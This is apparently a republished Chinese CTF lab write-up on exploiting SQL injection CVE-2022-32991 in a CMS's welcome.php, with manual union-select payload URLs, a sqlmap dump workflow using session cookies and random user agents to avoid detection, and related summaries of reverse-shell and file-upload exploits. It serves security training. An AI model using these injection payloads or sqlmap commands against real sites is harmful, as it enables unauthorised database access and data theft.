1、[春秋云镜]CVE-2022-32991

这篇具有很好参考价值的文章主要介绍了1、[春秋云镜]CVE-2022-32991。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、相关信息

  靶场提示:该CMS的welcome.php中存在SQL注入攻击。

  NVD关于漏洞的描述:
1、[春秋云镜]CVE-2022-32991,春秋云镜,安全

  注入点不仅在eid处!!!

二、解题思路(手注)

(1)既然NVD说漏洞在welcome.php处,且参数为eid,先注册账号。
1、[春秋云镜]CVE-2022-32991,春秋云镜,安全
(2)登录账号后,发现页面就是welcome.php。
1、[春秋云镜]CVE-2022-32991,春秋云镜,安全

(3)随便点一个action,点点submit,会发现url中的n参数会变。故,判断是否存在sql注入的payload:eci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1‘&t=10(单引号判断法)。

1、[春秋云镜]CVE-2022-32991,春秋云镜,安全
1、[春秋云镜]CVE-2022-32991,春秋云镜,安全

添加单引号后,页面报错,说明存在SQL注入。

👂👂👂知识点:在参数后面加,无论是字符型还是数字型注入,都会报错。

(4)判断是数字型注入还是字符型注入,payload:http://eci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20and%20%271%27%20=%20%271&t=10

1、[春秋云镜]CVE-2022-32991,春秋云镜,安全
http://eci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20and%20%271%27%20=%20%272&t=10
1、[春秋云镜]CVE-2022-32991,春秋云镜,安全

👂👂👂知识点:
(1)判断为数字型注入:

  • and 1=1(页面正常);
  • and 1=1 (页面报错)。
    (2)判断为字符型注入:
  • ’ and ‘1’='1(页面正常);
  • ’ and ‘1’='2(页面报错)。

(5)判断有几列,payload:http://eci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20order%20by%20%205%20--+%20%20#&t=10。经判断,表存在五列。
1、[春秋云镜]CVE-2022-32991,春秋云镜,安全

👂👂👂知识点:使用order by时,必须保证其之前的语句为真。

(6)判断回显位置,payload:http://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20union%20select%201,2,3,4,5--+&t=10
1、[春秋云镜]CVE-2022-32991,春秋云镜,安全
(7)数据库名,payload:http://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20union%20select%201,2,database(),4,5--+&t=10
1、[春秋云镜]CVE-2022-32991,春秋云镜,安全
(8)表名,payload:http://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20union%20select%201,2,(select group_concat(table_name) from information_schema.tables where table_schema='security'),4,5--+&t=10
1、[春秋云镜]CVE-2022-32991,春秋云镜,安全
(9)字段名,payload:http://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20union%20select%201,2,(select group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='flag'),4,5--+&t=10
1、[春秋云镜]CVE-2022-32991,春秋云镜,安全
(10)字段内容,payload:http://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20union%20select%201,2,(select group_concat(concat(flag,'%23')) from ctf.flag),4,5--+&t=10

1、[春秋云镜]CVE-2022-32991,春秋云镜,安全

三、通关思路(sqlmap)

👂👂👂注入六连:

  1. sqlmap -u "http://www.xx.com?id=x" (查询是否存在注入点)
  2. --dbs (检测站点包含哪些数据库)
  3. --current-db (获取当前的数据库名)
  4. --tables -D "db_name" (获取指定数据库中的表名 -D后接指定的数据库名称)
  5. --columns -T "table_name" -D "db_name"(获取数据库表中的字段)
  6. --dump -C "columns_name" -T "table_name" -D "db_name" (获取字段的数据内容)

注意:由于该页面采用了登录访问,所以首先想到要使用–cookie参数使得sqlmap绕过身份验证,并添加–user-agent参数或–random-agent使得sqlmap绕过客户端验证,否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断。如:

--cookie="PHPSESSID=k5854nfic1qngm5ul1vmb8pbma"
--user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"

(1)查询是否存在注入点,payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10 --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent
1、[春秋云镜]CVE-2022-32991,春秋云镜,安全

sqlmap爆破出:该站点存在两个注入点。

(2)检测站点包含哪些数据库,payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10 --dbs --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent

1、[春秋云镜]CVE-2022-32991,春秋云镜,安全
(3)获取当前数据库名,payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10 --current-db --batch --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent

--batch:默认确认,不询问你是否输入。

1、[春秋云镜]CVE-2022-32991,春秋云镜,安全
(4)获取指定数据库中的表名。payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10' --tables -D "ctf" --batch --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent

1、[春秋云镜]CVE-2022-32991,春秋云镜,安全
(5)获取指定数据库表中的字段名,payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10' --columns -T "flag" -D "ctf" --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent

1、[春秋云镜]CVE-2022-32991,春秋云镜,安全

(6)获取字段的数据内容,payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10' --dump -C "flag" -T "flag" -D "ctf" --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent

1、[春秋云镜]CVE-2022-32991,春秋云镜,安全文章来源地址https://www.toymoban.com/news/detail-682459.html

到了这里,关于1、[春秋云镜]CVE-2022-32991的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [春秋云镜] CVE-2022-28060 详细讲解

    目录 前期准备 工具+环境 渗透测试 靶场提示 靶场测试 burpsuite SQLmap Victor CMS v1.0 /includes/login.php 存在sql注入 1.打开开启的靶场,右边发现一个登入界面   2.任意输入账号密码,打开burpsuite进行抓包 3.将抓到的包放入一个文件,使用SQLmap去爆破 4.爆破出来之后,选择y生成文件,

    2024年02月13日
    浏览(30)
  • [春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

     访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来 时间3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag  动下小手来个赞吧~~~  和上面同类型,点击首页上面banner的admin,未授权直接进入,找到如图的注入点   抓包,保存为3.txt,s

    2024年02月11日
    浏览(37)
  • [春秋云镜]CVE-2021-41402

    flatCore-CMS v2.0.8 存在后台任意代码执行漏洞 春秋云镜开启靶场: http://eci-2ze1lmby62ykdsxiv9c1.cloudeci1.ichunqiu.com/ 前台爆破不了 我们先扫一下目录 Login eci-2ze1lmby62ykdsxiv9c1.cloudeci1.ichunqiu.com http://eci-2ze1lmby62ykdsxiv9c1.cloudeci1.ichunqiu.com/robots.txt 发现后台   使用0day登录后台 流程 Addons--I

    2024年02月12日
    浏览(31)
  • [春秋云镜]CVE-2014-3529

    Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。 春秋云镜开启靶场: http://eci-2ze9wvzaypj11h8emteu.cloudeci1.ichunqiu.com:8080/ 一:使用python开启一个web服务 python -m http.server 80 二:

    2023年04月19日
    浏览(23)
  • 春秋云镜 CVE-2019-16113

    在Bludit=3.9.2的版本中,攻击者可以通过定制uuid值将文件上传到指定的路径,然后通过bl-kernel/ajax/upload-images.php远程执行任意代码。 exp https://github.com/Kenun99/CVE-2019-16113-Dockerfile 修改poc.py,nc监听,反弹shell。 执行命令获取flag 得到flag flag{c54ea59f-e023-405a-af22-0202790209f2}

    2024年02月11日
    浏览(26)
  • [春秋云镜]CVE-2021-32305

    WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。 春秋云镜开启靶场: http://eci-2ze4llupfqpd6hmetmkb.cloudeci1.ichunqiu.com 验证漏洞 http://eci-2ze4llupfqpd6hmetmkb.cloudeci1.ichunqiu.com/search.php?sear

    2024年02月11日
    浏览(29)
  • [春秋云镜]CVE-2020-19960,CVE-2020-19961

    zz cms 2019 存在sql注入漏洞 (CVE-2020-19960,CVE-2020-19961即可通关文件上传漏洞获取flag) 春秋云镜开启靶场: http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/ 后台 http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/admin/login.php 账号admin 密码admin 登录进来找上传点  http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1

    2024年02月14日
    浏览(23)
  • 春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)

      靶标介绍: Subrion CMS 4.2.1 存在文件上传漏洞 进入题目: admin/admin    点击设置:  后台管理主页:  上传页面: 上传目录: /panel/uploads/   查看上传位置:  上传位置:  uploads/system.pht  flag{24505f02-d430-4d3b-905e-17349e09c34c}

    2024年02月11日
    浏览(25)
  • 【春秋云境】CVE-2022-30887

    标靶介绍: 多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任

    2024年02月16日
    浏览(28)
  • 春秋云境:CVE-2022-26965

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Pluck-CMS-Pluck-4.7.16 后台RCE 解题步骤 过弱口令登录:admin 登录之后按照图中位置进行主题安装 按照这位大哥文章: https://blog.csdn.net/weixin_39639260/article/details/116105945 中说的,需要将主题中的info.php文件修改,再打包成zip再上

    2024年02月04日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包